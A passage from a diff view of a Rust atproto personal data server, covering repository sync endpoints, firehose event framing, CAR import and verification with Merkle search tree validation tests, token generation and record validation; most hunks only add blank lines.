}
100
+
101
#[derive(Serialize)]
102
pub struct ListReposOutput {
103
pub cursor: Option<String>,
104
pub repos: Vec<RepoInfo>,
105
}
106
+
107
pub async fn list_repos(
108
State(state): State<AppState>,
109
Query(params): Query<ListReposParams>,
···
162
}
163
}
164
}
165
+
166
#[derive(Deserialize)]
167
pub struct GetRepoStatusParams {
168
pub did: String,
169
}
170
+
171
#[derive(Serialize)]
172
pub struct GetRepoStatusOutput {
173
pub did: String,
174
pub active: bool,
175
pub rev: Option<String>,
176
}
177
+
178
pub async fn get_repo_status(
179
State(state): State<AppState>,
180
Query(params): Query<GetRepoStatusParams>,
+4
src/sync/crawl.rs
···
8
use serde::Deserialize;
9
use serde_json::json;
10
use tracing::info;
11
#[derive(Deserialize)]
12
pub struct NotifyOfUpdateParams {
13
pub hostname: String,
14
}
15
pub async fn notify_of_update(
16
State(_state): State<AppState>,
17
Query(params): Query<NotifyOfUpdateParams>,
···
19
info!("Received notifyOfUpdate from hostname: {}", params.hostname);
20
(StatusCode::OK, Json(json!({}))).into_response()
21
}
22
#[derive(Deserialize)]
23
pub struct RequestCrawlInput {
24
pub hostname: String,
25
}
26
pub async fn request_crawl(
27
State(_state): State<AppState>,
28
Json(input): Json<RequestCrawlInput>,
···
8
use serde::Deserialize;
9
use serde_json::json;
10
use tracing::info;
11
+
12
#[derive(Deserialize)]
13
pub struct NotifyOfUpdateParams {
14
pub hostname: String,
15
}
16
+
17
pub async fn notify_of_update(
18
State(_state): State<AppState>,
19
Query(params): Query<NotifyOfUpdateParams>,
···
21
info!("Received notifyOfUpdate from hostname: {}", params.hostname);
22
(StatusCode::OK, Json(json!({}))).into_response()
23
}
24
+
25
#[derive(Deserialize)]
26
pub struct RequestCrawlInput {
27
pub hostname: String,
28
}
29
+
30
pub async fn request_crawl(
31
State(_state): State<AppState>,
32
Json(input): Json<RequestCrawlInput>,
+7
src/sync/deprecated.rs
···
14
use std::io::Write;
15
use std::str::FromStr;
16
use tracing::error;
17
const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000;
18
#[derive(Deserialize)]
19
pub struct GetHeadParams {
20
pub did: String,
21
}
22
#[derive(Serialize)]
23
pub struct GetHeadOutput {
24
pub root: String,
25
}
26
pub async fn get_head(
27
State(state): State<AppState>,
28
Query(params): Query<GetHeadParams>,
···
63
}
64
}
65
}
66
#[derive(Deserialize)]
67
pub struct GetCheckoutParams {
68
pub did: String,
69
}
70
pub async fn get_checkout(
71
State(state): State<AppState>,
72
Query(params): Query<GetCheckoutParams>,
···
168
)
169
.into_response()
170
}
171
fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) {
172
match value {
173
Ipld::Link(cid) => {
···
14
use std::io::Write;
15
use std::str::FromStr;
16
use tracing::error;
17
+
18
const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000;
19
+
20
#[derive(Deserialize)]
21
pub struct GetHeadParams {
22
pub did: String,
23
}
24
+
25
#[derive(Serialize)]
26
pub struct GetHeadOutput {
27
pub root: String,
28
}
29
+
30
pub async fn get_head(
31
State(state): State<AppState>,
32
Query(params): Query<GetHeadParams>,
···
67
}
68
}
69
}
70
+
71
#[derive(Deserialize)]
72
pub struct GetCheckoutParams {
73
pub did: String,
74
}
75
+
76
pub async fn get_checkout(
77
State(state): State<AppState>,
78
Query(params): Query<GetCheckoutParams>,
···
174
)
175
.into_response()
176
}
177
+
178
fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) {
179
match value {
180
Ipld::Link(cid) => {
+1
src/sync/firehose.rs
+13
src/sync/frame.rs
···
2
use serde::{Deserialize, Serialize};
3
use std::str::FromStr;
4
use crate::sync::firehose::SequencedEvent;
5
#[derive(Debug, Serialize, Deserialize)]
6
pub struct FrameHeader {
7
pub op: i64,
8
pub t: String,
9
}
10
#[derive(Debug, Serialize, Deserialize)]
11
pub struct CommitFrame {
12
pub seq: i64,
···
25
#[serde(rename = "prevData", skip_serializing_if = "Option::is_none")]
26
pub prev_data: Option<Cid>,
27
}
28
#[derive(Debug, Clone, Serialize, Deserialize)]
29
struct JsonRepoOp {
30
action: String,
···
32
cid: Option<String>,
33
prev: Option<String>,
34
}
35
#[derive(Debug, Serialize, Deserialize)]
36
pub struct RepoOp {
37
pub action: String,
···
40
#[serde(skip_serializing_if = "Option::is_none")]
41
pub prev: Option<Cid>,
42
}
43
#[derive(Debug, Serialize, Deserialize)]
44
pub struct IdentityFrame {
45
pub did: String,
···
48
pub seq: i64,
49
pub time: String,
50
}
51
#[derive(Debug, Serialize, Deserialize)]
52
pub struct AccountFrame {
53
pub did: String,
···
57
pub seq: i64,
58
pub time: String,
59
}
60
#[derive(Debug, Serialize, Deserialize)]
61
pub struct SyncFrame {
62
pub did: String,
···
66
pub seq: i64,
67
pub time: String,
68
}
69
pub struct CommitFrameBuilder {
70
pub seq: i64,
71
pub did: String,
···
75
pub blobs: Vec<String>,
76
pub time: chrono::DateTime<chrono::Utc>,
77
}
78
impl CommitFrameBuilder {
79
pub fn build(self) -> Result<CommitFrame, &'static str> {
80
let commit_cid = Cid::from_str(&self.commit_cid_str)
···
109
})
110
}
111
}
112
fn placeholder_rev() -> String {
113
use jacquard::types::{integer::LimitedU32, string::Tid};
114
Tid::now(LimitedU32::MIN).to_string()
115
}
116
fn format_atproto_time(dt: chrono::DateTime<chrono::Utc>) -> String {
117
dt.format("%Y-%m-%dT%H:%M:%S%.3fZ").to_string()
118
}
119
impl TryFrom<SequencedEvent> for CommitFrame {
120
type Error = &'static str;
121
fn try_from(event: SequencedEvent) -> Result<Self, Self::Error> {
122
let builder = CommitFrameBuilder {
123
seq: event.seq,
···
2
use serde::{Deserialize, Serialize};
3
use std::str::FromStr;
4
use crate::sync::firehose::SequencedEvent;
5
+
6
#[derive(Debug, Serialize, Deserialize)]
7
pub struct FrameHeader {
8
pub op: i64,
9
pub t: String,
10
}
11
+
12
#[derive(Debug, Serialize, Deserialize)]
13
pub struct CommitFrame {
14
pub seq: i64,
···
27
#[serde(rename = "prevData", skip_serializing_if = "Option::is_none")]
28
pub prev_data: Option<Cid>,
29
}
30
+
31
#[derive(Debug, Clone, Serialize, Deserialize)]
32
struct JsonRepoOp {
33
action: String,
···
35
cid: Option<String>,
36
prev: Option<String>,
37
}
38
+
39
#[derive(Debug, Serialize, Deserialize)]
40
pub struct RepoOp {
41
pub action: String,
···
44
#[serde(skip_serializing_if = "Option::is_none")]
45
pub prev: Option<Cid>,
46
}
47
+
48
#[derive(Debug, Serialize, Deserialize)]
49
pub struct IdentityFrame {
50
pub did: String,
···
53
pub seq: i64,
54
pub time: String,
55
}
56
+
57
#[derive(Debug, Serialize, Deserialize)]
58
pub struct AccountFrame {
59
pub did: String,
···
63
pub seq: i64,
64
pub time: String,
65
}
66
+
67
#[derive(Debug, Serialize, Deserialize)]
68
pub struct SyncFrame {
69
pub did: String,
···
73
pub seq: i64,
74
pub time: String,
75
}
76
+
77
pub struct CommitFrameBuilder {
78
pub seq: i64,
79
pub did: String,
···
83
pub blobs: Vec<String>,
84
pub time: chrono::DateTime<chrono::Utc>,
85
}
86
+
87
impl CommitFrameBuilder {
88
pub fn build(self) -> Result<CommitFrame, &'static str> {
89
let commit_cid = Cid::from_str(&self.commit_cid_str)
···
118
})
119
}
120
}
121
+
122
fn placeholder_rev() -> String {
123
use jacquard::types::{integer::LimitedU32, string::Tid};
124
Tid::now(LimitedU32::MIN).to_string()
125
}
126
+
127
fn format_atproto_time(dt: chrono::DateTime<chrono::Utc>) -> String {
128
dt.format("%Y-%m-%dT%H:%M:%S%.3fZ").to_string()
129
}
130
+
131
impl TryFrom<SequencedEvent> for CommitFrame {
132
type Error = &'static str;
133
+
134
fn try_from(event: SequencedEvent) -> Result<Self, Self::Error> {
135
let builder = CommitFrameBuilder {
136
seq: event.seq,
+15
src/sync/import.rs
···
9
use thiserror::Error;
use tracing::debug;
use uuid::Uuid;
+
#[derive(Error, Debug)]
pub enum ImportError {
    #[error("CAR parsing error: {0}")]
···
    #[error("DID mismatch: CAR is for {car_did}, but authenticated as {auth_did}")]
    DidMismatch { car_did: String, auth_did: String },
}
+
#[derive(Debug, Clone)]
pub struct BlobRef {
    pub cid: String,
    pub mime_type: Option<String>,
}
+
pub async fn parse_car(data: &[u8]) -> Result<(Cid, HashMap<Cid, Bytes>), ImportError> {
    let cursor = Cursor::new(data);
    let mut reader = CarReader::new(cursor)
···
    }
    Ok((root, blocks))
}
+
pub fn find_blob_refs_ipld(value: &Ipld, depth: usize) -> Vec<BlobRef> {
    if depth > 32 {
        return vec![];
···
        _ => vec![],
    }
}
+
pub fn find_blob_refs(value: &JsonValue, depth: usize) -> Vec<BlobRef> {
    if depth > 32 {
        return vec![];
···
        _ => vec![],
    }
}
+
pub fn extract_links(value: &Ipld, links: &mut Vec<Cid>) {
    match value {
        Ipld::Link(cid) => {
···
        _ => {}
    }
}
+
#[derive(Debug)]
pub struct ImportedRecord {
    pub collection: String,
···
    pub cid: Cid,
    pub blob_refs: Vec<BlobRef>,
}
+
pub fn walk_mst(
    blocks: &HashMap<Cid, Bytes>,
    root_cid: &Cid,
···
    }
    Ok(records)
}
+
pub struct CommitInfo {
    pub rev: Option<String>,
    pub prev: Option<String>,
}
+
fn extract_commit_info(commit: &Ipld) -> Result<(Cid, CommitInfo), ImportError> {
    let obj = match commit {
        Ipld::Map(m) => m,
···
    });
    Ok((data_cid, CommitInfo { rev, prev }))
}
+
pub async fn apply_import(
    db: &PgPool,
    user_id: Uuid,
···
    );
    Ok(records)
}
+
#[cfg(test)]
mod tests {
    use super::*;
+
    #[test]
    fn test_find_blob_refs() {
        let record = serde_json::json!({
···
        );
        assert_eq!(blob_refs[0].mime_type, Some("image/jpeg".to_string()));
    }
+
    #[test]
    fn test_find_blob_refs_no_blobs() {
        let record = serde_json::json!({
···
        let blob_refs = find_blob_refs(&record, 0);
        assert!(blob_refs.is_empty());
    }
+
    #[test]
    fn test_find_blob_refs_depth_limit() {
        fn deeply_nested(depth: usize) -> JsonValue {
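A minimal usage sketch (not part of the diff) of the two fully-shown entry points above, parse_car and find_blob_refs. The embedded blob shape in the JSON record is illustrative and assumes the standard atproto blob layout ($type/ref/mimeType); the placeholder CID is not a real value.

async fn import_sketch(car_bytes: &[u8]) -> Result<(), ImportError> {
    // parse_car yields the root commit CID plus every block keyed by CID.
    let (root, blocks) = parse_car(car_bytes).await?;
    debug!(%root, block_count = blocks.len(), "parsed CAR");

    // find_blob_refs walks a JSON record (depth-capped at 32) and collects blob CIDs.
    let record = serde_json::json!({
        "$type": "app.bsky.feed.post",
        "embed": {
            "$type": "blob",
            "ref": { "$link": "bafkreexamplecid" },  // placeholder CID
            "mimeType": "image/jpeg"
        }
    });
    for blob in find_blob_refs(&record, 0) {
        debug!(cid = %blob.cid, mime = ?blob.mime_type, "found blob reference");
    }
    Ok(())
}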
+3 src/sync/listener.rs
···
use sqlx::postgres::PgListener;
use std::sync::atomic::{AtomicI64, Ordering};
use tracing::{debug, error, info, warn};
+
static LAST_BROADCAST_SEQ: AtomicI64 = AtomicI64::new(0);
+
pub async fn start_sequencer_listener(state: AppState) {
    let initial_seq = sqlx::query_scalar!("SELECT COALESCE(MAX(seq), 0) as max FROM repo_seq")
        .fetch_one(&state.db)
···
        }
    });
}
+
async fn listen_loop(state: AppState) -> anyhow::Result<()> {
    let mut listener = PgListener::connect_with(&state.db).await?;
    listener.listen("repo_updates").await?;
+1 src/sync/mod.rs
+9 src/sync/repo.rs
···
use std::io::Write;
use std::str::FromStr;
use tracing::error;
+
const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000;
+
#[derive(Deserialize)]
pub struct GetBlocksQuery {
    pub did: String,
    pub cids: String,
}
+
pub async fn get_blocks(
    State(state): State<AppState>,
    Query(query): Query<GetBlocksQuery>,
···
    )
    .into_response()
}
+
#[derive(Deserialize)]
pub struct GetRepoQuery {
    pub did: String,
    pub since: Option<String>,
}
+
pub async fn get_repo(
    State(state): State<AppState>,
    Query(query): Query<GetRepoQuery>,
···
    )
    .into_response()
}
+
fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) {
    match value {
        Ipld::Link(cid) => {
···
        _ => {}
    }
}
+
#[derive(Deserialize)]
pub struct GetRecordQuery {
    pub did: String,
    pub collection: String,
    pub rkey: String,
}
+
pub async fn get_record(
    State(state): State<AppState>,
    Query(query): Query<GetRecordQuery>,
···
    use jacquard_repo::mst::Mst;
    use std::collections::BTreeMap;
    use std::sync::Arc;
+
    let repo_row = sqlx::query!(
        r#"
        SELECT r.repo_root_cid
+8 src/sync/subscribe_repos.rs
···
use std::sync::atomic::{AtomicUsize, Ordering};
use tokio::sync::broadcast::error::RecvError;
use tracing::{error, info, warn};
+
const BACKFILL_BATCH_SIZE: i64 = 1000;
+
static SUBSCRIBER_COUNT: AtomicUsize = AtomicUsize::new(0);
+
#[derive(Deserialize)]
pub struct SubscribeReposParams {
    pub cursor: Option<i64>,
}
+
#[axum::debug_handler]
pub async fn subscribe_repos(
    ws: WebSocketUpgrade,
···
) -> Response {
    ws.on_upgrade(move |socket| handle_socket(socket, state, params))
}
+
async fn send_event(
    socket: &mut WebSocket,
    state: &AppState,
···
    socket.send(Message::Binary(bytes.into())).await?;
    Ok(())
}
+
pub fn get_subscriber_count() -> usize {
    SUBSCRIBER_COUNT.load(Ordering::SeqCst)
}
+
async fn handle_socket(mut socket: WebSocket, state: AppState, params: SubscribeReposParams) {
    let count = SUBSCRIBER_COUNT.fetch_add(1, Ordering::SeqCst) + 1;
    crate::metrics::set_firehose_subscribers(count);
···
    crate::metrics::set_firehose_subscribers(count);
    info!(subscribers = count, "Firehose subscriber disconnected");
}
+
async fn handle_socket_inner(socket: &mut WebSocket, state: &AppState, params: SubscribeReposParams) -> Result<(), ()> {
    if let Some(cursor) = params.cursor {
        let mut current_cursor = cursor;
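For context, a minimal firehose consumer sketch (not part of the diff). The tokio-tungstenite and futures-util crates, the localhost:3000 address, and mounting the handler at the standard com.atproto.sync.subscribeRepos XRPC path are all assumptions here.

use futures_util::StreamExt;
use tokio_tungstenite::{connect_async, tungstenite::Message};

#[tokio::main]
async fn main() -> anyhow::Result<()> {
    // cursor=0 asks the server to backfill from repo_seq (paged by BACKFILL_BATCH_SIZE)
    // before it switches over to live broadcast events.
    let url = "ws://localhost:3000/xrpc/com.atproto.sync.subscribeRepos?cursor=0";
    let (mut socket, _response) = connect_async(url).await?;
    while let Some(frame) = socket.next().await {
        match frame? {
            // Each event arrives as a binary DAG-CBOR frame, as built by format_event_for_sending.
            Message::Binary(bytes) => println!("event frame: {} bytes", bytes.len()),
            Message::Close(_) => break,
            _ => {}
        }
    }
    Ok(())
}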
+10 src/sync/util.rs
···
use std::io::Cursor;
use std::str::FromStr;
use tokio::io::AsyncWriteExt;
+
fn extract_rev_from_commit_bytes(commit_bytes: &[u8]) -> Option<String> {
    Commit::from_cbor(commit_bytes).ok().map(|c| c.rev().to_string())
}
+
async fn write_car_blocks(
    commit_cid: Cid,
    commit_bytes: Option<Bytes>,
···
        .map_err(|e| anyhow::anyhow!("flushing CAR buffer: {}", e))?;
    Ok(buffer.into_inner())
}
+
fn format_atproto_time(dt: chrono::DateTime<chrono::Utc>) -> String {
    dt.format("%Y-%m-%dT%H:%M:%S%.3fZ").to_string()
}
+
fn format_identity_event(event: &SequencedEvent) -> Result<Vec<u8>, anyhow::Error> {
    let frame = IdentityFrame {
        did: event.did.clone(),
···
    serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
    Ok(bytes)
}
+
fn format_account_event(event: &SequencedEvent) -> Result<Vec<u8>, anyhow::Error> {
    let frame = AccountFrame {
        did: event.did.clone(),
···
    serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
    Ok(bytes)
}
+
async fn format_sync_event(
    state: &AppState,
    event: &SequencedEvent,
···
    serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
    Ok(bytes)
}
+
pub async fn format_event_for_sending(
    state: &AppState,
    event: SequencedEvent,
···
    serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
    Ok(bytes)
}
+
pub async fn prefetch_blocks_for_events(
    state: &AppState,
    events: &[SequencedEvent],
···
    }
    Ok(blocks_map)
}
+
fn format_sync_event_with_prefetched(
    event: &SequencedEvent,
    prefetched: &HashMap<Cid, Bytes>,
···
    serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
    Ok(bytes)
}
+
pub async fn format_event_with_prefetched_blocks(
    event: SequencedEvent,
    prefetched: &HashMap<Cid, Bytes>,
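A small sketch (not in the diff) of the timestamp shape produced by format_atproto_time above: RFC 3339 with millisecond precision and a literal Z suffix.

fn timestamp_sketch() {
    // Same format string as format_atproto_time.
    let stamp = chrono::Utc::now()
        .format("%Y-%m-%dT%H:%M:%S%.3fZ")
        .to_string();
    // e.g. "2024-01-01T12:34:56.789Z" (illustrative value)
    assert!(stamp.ends_with('Z'));
    assert_eq!(stamp.len(), 24);
}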
+13 src/sync/verify.rs
···
use std::collections::HashMap;
use thiserror::Error;
use tracing::{debug, warn};
+
#[derive(Error, Debug)]
pub enum VerifyError {
    #[error("Invalid commit: {0}")]
···
    #[error("Invalid CBOR: {0}")]
    InvalidCbor(String),
}
+
pub struct CarVerifier {
    http_client: Client,
}
+
impl Default for CarVerifier {
    fn default() -> Self {
        Self::new()
    }
}
+
impl CarVerifier {
    pub fn new() -> Self {
        Self {
···
                .unwrap_or_default(),
        }
    }
+
    pub async fn verify_car(
        &self,
        expected_did: &str,
···
            prev: commit.prev().cloned(),
        })
    }
+
    async fn resolve_did_signing_key(&self, did: &str) -> Result<PublicKey<'static>, VerifyError> {
        let did_doc = self.resolve_did_document(did).await?;
        did_doc
···
            .map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?
            .ok_or(VerifyError::NoSigningKey)
    }
+
    async fn resolve_did_document(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> {
        if did.starts_with("did:plc:") {
            self.resolve_plc_did(did).await
···
            )))
        }
    }
+
    async fn resolve_plc_did(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> {
        let plc_url = std::env::var("PLC_DIRECTORY_URL")
            .unwrap_or_else(|_| "https://plc.directory".to_string());
···
            .map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?;
        Ok(doc.into_static())
    }
+
    async fn resolve_web_did(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> {
        let domain = did
            .strip_prefix("did:web:")
···
            .map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?;
        Ok(doc.into_static())
    }
+
    fn verify_mst_structure(
        &self,
        data_cid: &Cid,
        blocks: &HashMap<Cid, Bytes>,
    ) -> Result<(), VerifyError> {
        use ipld_core::ipld::Ipld;
+
        let mut stack = vec![*data_cid];
        let mut visited = std::collections::HashSet::new();
        let mut node_count = 0;
···
        Ok(())
    }
}
+
#[derive(Debug, Clone)]
pub struct VerifiedCar {
    pub did: String,
···
    pub data_cid: Cid,
    pub prev: Option<Cid>,
}
+
#[cfg(test)]
#[path = "verify_tests.rs"]
mod tests;
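The traversal guard inside verify_mst_structure is worth calling out. Below is a generic sketch of the same pattern (explicit stack, visited set, hard node cap) with hypothetical names; it is not the module's actual code.

use std::collections::HashSet;

// Walk a graph iteratively, refusing to revisit nodes or exceed a node budget.
fn bounded_walk(start: u64, children: impl Fn(u64) -> Vec<u64>, cap: usize) -> Result<usize, String> {
    let mut stack = vec![start];
    let mut visited = HashSet::new();
    let mut node_count = 0usize;
    while let Some(node) = stack.pop() {
        if !visited.insert(node) {
            continue; // already seen: a cycle cannot loop forever
        }
        node_count += 1;
        if node_count > cap {
            return Err("node budget exceeded".to_string());
        }
        stack.extend(children(node));
    }
    Ok(node_count)
}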
+22 src/sync/verify_tests.rs
···
use cid::Cid;
use sha2::{Digest, Sha256};
use std::collections::HashMap;
+
fn make_cid(data: &[u8]) -> Cid {
    let mut hasher = Sha256::new();
    hasher.update(data);
···
    let multihash = multihash::Multihash::wrap(0x12, &hash).unwrap();
    Cid::new_v1(0x71, multihash)
}
+
#[test]
fn test_verifier_creation() {
    let _verifier = CarVerifier::new();
}
+
#[test]
fn test_verify_error_display() {
    let err = VerifyError::DidMismatch {
···
    let err = VerifyError::MstValidationFailed("test error".to_string());
    assert!(err.to_string().contains("test error"));
}
+
#[test]
fn test_mst_validation_missing_root_block() {
    let verifier = CarVerifier::new();
···
    let err = result.unwrap_err();
    assert!(matches!(err, VerifyError::BlockNotFound(_)));
}
+
#[test]
fn test_mst_validation_invalid_cbor() {
    let verifier = CarVerifier::new();
···
    let err = result.unwrap_err();
    assert!(matches!(err, VerifyError::InvalidCbor(_)));
}
+
#[test]
fn test_mst_validation_empty_node() {
    let verifier = CarVerifier::new();
···
    let result = verifier.verify_mst_structure(&cid, &blocks);
    assert!(result.is_ok());
}
+
#[test]
fn test_mst_validation_missing_left_pointer() {
    use ipld_core::ipld::Ipld;
+
    let verifier = CarVerifier::new();
    let missing_left_cid = make_cid(b"missing left");
    let node = Ipld::Map(std::collections::BTreeMap::from([
···
    assert!(matches!(err, VerifyError::BlockNotFound(_)));
    assert!(err.to_string().contains("left pointer"));
}
+
#[test]
fn test_mst_validation_missing_subtree() {
    use ipld_core::ipld::Ipld;
+
    let verifier = CarVerifier::new();
    let missing_subtree_cid = make_cid(b"missing subtree");
    let record_cid = make_cid(b"record");
···
    assert!(matches!(err, VerifyError::BlockNotFound(_)));
    assert!(err.to_string().contains("subtree"));
}
+
#[test]
fn test_mst_validation_unsorted_keys() {
    use ipld_core::ipld::Ipld;
+
    let verifier = CarVerifier::new();
    let record_cid = make_cid(b"record");
    let entry1 = Ipld::Map(std::collections::BTreeMap::from([
···
    assert!(matches!(err, VerifyError::MstValidationFailed(_)));
    assert!(err.to_string().contains("sorted"));
}
+
#[test]
fn test_mst_validation_sorted_keys_ok() {
    use ipld_core::ipld::Ipld;
+
    let verifier = CarVerifier::new();
    let record_cid = make_cid(b"record");
    let entry1 = Ipld::Map(std::collections::BTreeMap::from([
···
    let result = verifier.verify_mst_structure(&cid, &blocks);
    assert!(result.is_ok());
}
+
#[test]
fn test_mst_validation_with_valid_left_pointer() {
    use ipld_core::ipld::Ipld;
+
    let verifier = CarVerifier::new();
    let left_node = Ipld::Map(std::collections::BTreeMap::from([
        ("e".to_string(), Ipld::List(vec![])),
···
    let result = verifier.verify_mst_structure(&root_cid, &blocks);
    assert!(result.is_ok());
}
+
#[test]
fn test_mst_validation_cycle_detection() {
    let verifier = CarVerifier::new();
···
    let result = verifier.verify_mst_structure(&cid, &blocks);
    assert!(result.is_ok());
}
+
#[tokio::test]
async fn test_unsupported_did_method() {
    let verifier = CarVerifier::new();
···
    assert!(matches!(err, VerifyError::DidResolutionFailed(_)));
    assert!(err.to_string().contains("Unsupported"));
}
+
#[test]
fn test_mst_validation_with_prefix_compression() {
    use ipld_core::ipld::Ipld;
+
    let verifier = CarVerifier::new();
    let record_cid = make_cid(b"record");
    let entry1 = Ipld::Map(std::collections::BTreeMap::from([
···
    let result = verifier.verify_mst_structure(&cid, &blocks);
    assert!(result.is_ok(), "Prefix-compressed keys should be validated correctly");
}
+
#[test]
fn test_mst_validation_prefix_compression_unsorted() {
    use ipld_core::ipld::Ipld;
+
    let verifier = CarVerifier::new();
    let record_cid = make_cid(b"record");
    let entry1 = Ipld::Map(std::collections::BTreeMap::from([
+16 src/util.rs
···
use rand::Rng;
use sqlx::PgPool;
use uuid::Uuid;
+
const BASE32_ALPHABET: &str = "abcdefghijklmnopqrstuvwxyz234567";
+
pub fn generate_token_code() -> String {
    generate_token_code_parts(2, 5)
}
+
pub fn generate_token_code_parts(parts: usize, part_len: usize) -> String {
    let mut rng = rand::thread_rng();
    let chars: Vec<char> = BASE32_ALPHABET.chars().collect();
+
    (0..parts)
        .map(|_| {
            (0..part_len)
···
        .collect::<Vec<_>>()
        .join("-")
}
+
#[derive(Debug)]
pub enum DbLookupError {
    NotFound,
    DatabaseError(sqlx::Error),
}
+
impl From<sqlx::Error> for DbLookupError {
    fn from(e: sqlx::Error) -> Self {
        DbLookupError::DatabaseError(e)
    }
}
+
pub async fn get_user_id_by_did(db: &PgPool, did: &str) -> Result<Uuid, DbLookupError> {
    sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
        .fetch_optional(db)
        .await?
        .ok_or(DbLookupError::NotFound)
}
+
pub struct UserInfo {
    pub id: Uuid,
    pub did: String,
    pub handle: String,
}
+
pub async fn get_user_by_did(db: &PgPool, did: &str) -> Result<UserInfo, DbLookupError> {
    sqlx::query_as!(
        UserInfo,
···
    .await?
    .ok_or(DbLookupError::NotFound)
}
+
pub async fn get_user_by_identifier(db: &PgPool, identifier: &str) -> Result<UserInfo, DbLookupError> {
    sqlx::query_as!(
        UserInfo,
···
    .await?
    .ok_or(DbLookupError::NotFound)
}
+
#[cfg(test)]
mod tests {
    use super::*;
+
    #[test]
    fn test_generate_token_code() {
        let code = generate_token_code();
        assert_eq!(code.len(), 11);
        assert!(code.contains('-'));
+
        let parts: Vec<&str> = code.split('-').collect();
        assert_eq!(parts.len(), 2);
        assert_eq!(parts[0].len(), 5);
        assert_eq!(parts[1].len(), 5);
+
        for c in code.chars() {
            if c != '-' {
                assert!(BASE32_ALPHABET.contains(c));
            }
        }
    }
+
    #[test]
    fn test_generate_token_code_parts() {
        let code = generate_token_code_parts(3, 4);
        let parts: Vec<&str> = code.split('-').collect();
        assert_eq!(parts.len(), 3);
+
        for part in parts {
            assert_eq!(part.len(), 4);
        }
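A quick sketch (not in the diff) of the token helpers defined above: the default is two base32 groups of five characters, and the part layout is configurable.

fn token_sketch() {
    let code = generate_token_code();            // e.g. "k3tpz-ab2c7" (illustrative value)
    assert_eq!(code.split('-').count(), 2);
    assert_eq!(code.len(), 11);

    let long = generate_token_code_parts(4, 8);  // four 8-character groups
    assert_eq!(long.split('-').count(), 4);
    assert_eq!(long.len(), 4 * 8 + 3);           // three '-' separators
}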
+30 src/validation/mod.rs
···
use serde_json::Value;
use thiserror::Error;
+
#[derive(Debug, Error)]
pub enum ValidationError {
    #[error("No $type provided")]
···
    #[error("Unknown record type: {0}")]
    UnknownType(String),
}
+
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ValidationStatus {
    Valid,
    Unknown,
    Invalid,
}
+
pub struct RecordValidator {
    require_lexicon: bool,
}
+
impl Default for RecordValidator {
    fn default() -> Self {
        Self::new()
    }
}
+
impl RecordValidator {
    pub fn new() -> Self {
        Self {
            require_lexicon: false,
        }
    }
+
    pub fn require_lexicon(mut self, require: bool) -> Self {
        self.require_lexicon = require;
        self
    }
+
    pub fn validate(
        &self,
        record: &Value,
···
        }
        Ok(ValidationStatus::Valid)
    }
+
    fn validate_post(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("text") {
            return Err(ValidationError::MissingField("text".to_string()));
···
        }
        Ok(())
    }
+
    fn validate_profile(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) {
            let grapheme_count = display_name.chars().count();
···
        }
        Ok(())
    }
+
    fn validate_like(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("subject") {
            return Err(ValidationError::MissingField("subject".to_string()));
···
        self.validate_strong_ref(obj.get("subject"), "subject")?;
        Ok(())
    }
+
    fn validate_repost(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("subject") {
            return Err(ValidationError::MissingField("subject".to_string()));
···
        self.validate_strong_ref(obj.get("subject"), "subject")?;
        Ok(())
    }
+
    fn validate_follow(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("subject") {
            return Err(ValidationError::MissingField("subject".to_string()));
···
        }
        Ok(())
    }
+
    fn validate_block(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("subject") {
            return Err(ValidationError::MissingField("subject".to_string()));
···
        }
        Ok(())
    }
+
    fn validate_list(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("name") {
            return Err(ValidationError::MissingField("name".to_string()));
···
        }
        Ok(())
    }
+
    fn validate_list_item(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("subject") {
            return Err(ValidationError::MissingField("subject".to_string()));
···
        }
        Ok(())
    }
+
    fn validate_feed_generator(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("did") {
            return Err(ValidationError::MissingField("did".to_string()));
···
        }
        Ok(())
    }
+
    fn validate_threadgate(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("post") {
            return Err(ValidationError::MissingField("post".to_string()));
···
        }
        Ok(())
    }
+
    fn validate_labeler_service(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("policies") {
            return Err(ValidationError::MissingField("policies".to_string()));
···
        }
        Ok(())
    }
+
    fn validate_strong_ref(&self, value: Option<&Value>, path: &str) -> Result<(), ValidationError> {
        let obj = value
            .and_then(|v| v.as_object())
···
        Ok(())
    }
}
+
fn validate_datetime(value: &str, path: &str) -> Result<(), ValidationError> {
    if chrono::DateTime::parse_from_rfc3339(value).is_err() {
        return Err(ValidationError::InvalidDatetime {
···
    }
    Ok(())
}
+
pub fn validate_record_key(rkey: &str) -> Result<(), ValidationError> {
    if rkey.is_empty() {
        return Err(ValidationError::InvalidRecord("Record key cannot be empty".to_string()));
···
    }
    Ok(())
}
+
pub fn validate_collection_nsid(collection: &str) -> Result<(), ValidationError> {
